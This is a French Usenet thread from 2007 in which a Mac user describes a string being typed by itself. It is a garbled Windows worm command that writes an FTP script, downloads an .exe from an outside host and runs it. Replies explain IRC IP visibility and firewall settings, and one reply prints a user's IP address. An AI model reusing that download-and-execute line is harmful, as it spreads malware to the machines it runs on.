Un Virus ?

92 réponses
RiGuad
Je m'en remet aux avis autorisés n'y comprenant plus rien a une
situation que je vis depuis 2 semaines :

Dans n'importe quelle situation, a n'importe quel moment , y compris
quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
"écrit " tout seul les "choses" suivantes :

(syste,root(`syste,ӎ`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit

Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
debrancher de son port usb, et de le rebrancher.
Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
"prend la main" sur tout ce que je peux faire , y compris debrancher le
clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
ci dessus indiquée.

Un reboot ne change rien, ni reparation des autorisation, ni extinction
redémarrage.

Le plus insupportable est lorsque l'on tchatte avec un ami, ou cette
ligne incontrolable se tape toute seule , et ... se termine par un
Return ! L'ami recoie ca en plleine figure, et je dois debrancher
rebrancher mon clavier pour m'excuser.

Qu faire pour arreter ceci ? je ne vais quand meme pas reinstaller mon
Tiger ! ?

Merci a tous.

10 réponses

patpro ~ patrick proniewski
In article <45ec7659$0$5097$,
RiGuad wrote:

Et pour clore le sujet, je viens de m'infecter pas à l'insu de mon
plein gré du tout avec un des trucs trouvés sur le FTP en question.
Dans la seconde qui suit le lancement du programme (qui n'était hier
pas reconnu par la majorité des anti-virus), ma bécane va causer à un
japonais et ils se racontent

Ceci confirme tout de meme que ca n'a pas l'air d'etre courant, ces
attaques sur des ordis de particuliers...

A propos d'autre chose...Parlant de ce sujet dans un salon IRC avec un
interlocuteur habituel, alors que j'etais sous Snak, et lui sous mIRC,
ce mecapc m'a fait la demo qu'il pouvait, en live, obtenir mon adresse
IP, pendant le tchat sous IRC.

Ca m'a scié, et bien sur, ne dérogeant pas au profil des mecapc frimeurs
comme c'est pas racontable, je n'ai pas eu d'explication de sa part.

Comment est il possible de recueillir l'adresse IP d'un interlocuteur
alors qu'on a un dialogue sous IRC avec lui ?

Merci de m'eclairer...

holala... ça fait longtemps que tu fais de l'IRC ? Parce que bon, l'IP
de connexion d'une personne sur IRC, c'est l'affaire de 2 secondes,
c'est une donnée publique (contrairement à des MSN et autres AIM).

patpro

--
http://www.patpro.net/

RiGuad
holala... ça fait longtemps que tu fais de l'IRC ? Parce que bon, l'IP
de connexion d'une personne sur IRC, c'est l'affaire de 2 secondes,
c'est une donnée publique (contrairement à des MSN et autres AIM).

patpro

Ben d'abord je ne me suis jamais interessé a l'obtention des IP des

gens, et ensuite sur les salons Orange que je pratique, les IP ne sont
pas visibles contrairement a d'autres.
Quand je dis "visibles" , c'est vraiment visbles sans manip, genre a
droite du pseudo, sur certains salons , tu vois le userhost complet , IP
comprite...
Mais sur les salons Orange, les userhost sont codés, il sont pas en clair.
Alors j'aimerais bien savoir comment ce frimeur le fait...

RiGuad

holala... ça fait longtemps que tu fais de l'IRC ? Parce que bon, l'IP
de connexion d'une personne sur IRC, c'est l'affaire de 2 secondes,
c'est une donnée publique (contrairement à des MSN et autres AIM).

patpro

Ben d'abord je ne me suis jamais interessé a l'obtention des IP des

gens, et ensuite sur les salons Orange que je pratique, les IP ne sont
pas visibles contrairement a d'autres.
Quand je dis "visibles" , c'est vraiment visbles sans manip, genre a
droite du pseudo, sur certains salons , tu vois le userhost complet , IP
comprite...
Mais sur les salons Orange, les userhost sont codés, il sont pas en clair.
Alors j'aimerais bien savoir comment ce frimeur le fait...

Euh... je complete là... de memoire Snak dans sa derniere version
accepte une commande "/dns", je crois que c'est en rapport...
MAis elle ne donne rien, cette commande, pas d'IP.

Nina Popravka
On Mon, 05 Mar 2007 15:58:14 -0400, RiGuad
wrote:

Ceci confirme tout de meme que ca n'a pas l'air d'etre courant, ces
attaques sur des ordis de particuliers...

Hum... t'es bouché, ou quoi ????
Ca fait 3 jours que je perd mon temps à t'expliquer que c'est le
quotidien, et que des milliers de machines passent leur vie
(involontairement en général) à arpenter le net à la recherche de
failles.

Comment est il possible de recueillir l'adresse IP d'un interlocuteur
alors qu'on a un dialogue sous IRC avec lui ?

De la même manière que tout le monde connaît la tienne quand tu postes
ici, où est le problème ??????????
--
Nina

RiGuad

Comment est il possible de recueillir l'adresse IP d'un interlocuteur
alors qu'on a un dialogue sous IRC avec lui ?

De la même manière que tout le monde connaît la tienne quand tu postes
ici, où est le problème ??????????

Ben ici ou dans les transactions pas mail , il suffit de lire les
entetes, mais dans un dialogue IRC, ya pas d'entete...Tu as le fenetre
de dialogue a la msn, mais dans laquelle tu peux taper des comandes
precedées de "/" alors a moins d'une commande que je ne connait pas , je
ne vois pas , sachant que les userhost des Pseudos sont souvent codés...

Nina Popravka
On Mon, 05 Mar 2007 16:22:30 -0400, RiGuad
wrote:

MAis elle ne donne rien, cette commande, pas d'IP.

Mais tout le monde s'en fout, que tu sois 81.248.178.163 à l'heure où
tu postes.
Rien n'est dirigé contre toi spécifiquement.
--
Nina

patpro ~ patrick proniewski
In article <45ec7b83$0$5096$,
RiGuad wrote:

Ben d'abord je ne me suis jamais interessé a l'obtention des IP des
gens, et ensuite sur les salons Orange que je pratique, les IP ne sont
pas visibles contrairement a d'autres.
Quand je dis "visibles" , c'est vraiment visbles sans manip, genre a
droite du pseudo, sur certains salons , tu vois le userhost complet , IP
comprite...
Mais sur les salons Orange, les userhost sont codés, il sont pas en clair.
Alors j'aimerais bien savoir comment ce frimeur le fait...

et /whois avec ton login ? :)

(c'est quoi ces serveurs IRC qui masquent l'IP ??)

patpro

--
http://www.patpro.net/

Nina Popravka
On Mon, 05 Mar 2007 22:04:23 +0100, patpro ~ patrick proniewski
wrote:

et /whois avec ton login ? :)
(c'est quoi ces serveurs IRC qui masquent l'IP ??)

Heu... à ton âge tu nous démarres une carrière de hAckErz , ou quoi
??????????????????
--
Nina

Henripasdespammerci
RiGuad wrote:
Bref, je me demande pourquoi j'ai ces phenomenes que je n'avais pas
avant
ben, t'avais laissé une porte et quelqu'un a tourné la poignée pour voir

si c'étais vraiement fermé ...

et je ne vois toujours pas comment les arreter, autrement qu'en
demandant a NetBarrier de stopper les connections entrantes, ce qui
d'ailleurs me fait dire que je n'ai pas un virus déposé sur le disque
dur de mon Mac, mais que ce sont la des attaques externes permanentes.

Autant que je sache, NetBarrier n'est qu'une interface de daemons Unix
préxistants

Le firewall du Macounet (qui fait appel aux dits daemons) marche dans
Préférences Système => Partage => coupe-feu, cliquer sur (Démarrer),
décocher tout ce qu'il l'est sauf ce dont on a besoin quand on en a
besoin, cliquer sur (Avancé) en bas à droite et cliquer les trois cases
Bloquer le trafic UDP (sauf su on faot du P2P) Activer la conservation
de l'historique du coupe-feu et Activer le mode furtif

Pour vivre heureux, vivons cachés ;-)

Sinon, si tu veux te donner des angoisses, tu as Utilitaire de réseau et
Netstat ou Port scan ...

Henri
--
Henri Balmain
http://freenours.org

lists
RiGuad wrote:

Ben ici ou dans les transactions pas mail , il suffit de lire les
entetes, mais dans un dialogue IRC, ya pas d'entete...Tu as le fenetre
de dialogue a la msn, mais dans laquelle tu peux taper des comandes
precedées de "/" alors a moins d'une commande que je ne connait pas , je
ne vois pas , sachant que les userhost des Pseudos sont souvent codés...

Je ne suis pas spécialiste d'IRC mais :
/whois pseudo_du_gars
ça le fait non ?

Sinon :
/help
pour avoir la liste des commandes

--
R: Parce que ça renverse bêtement l'ordre naturel de lecture!
Q: Mais pourquoi citer en fin d'article est-il si effroyable?
R: Citer en fin d'article
Q: Quelle est la chose la plus désagréable sur les groupes de news?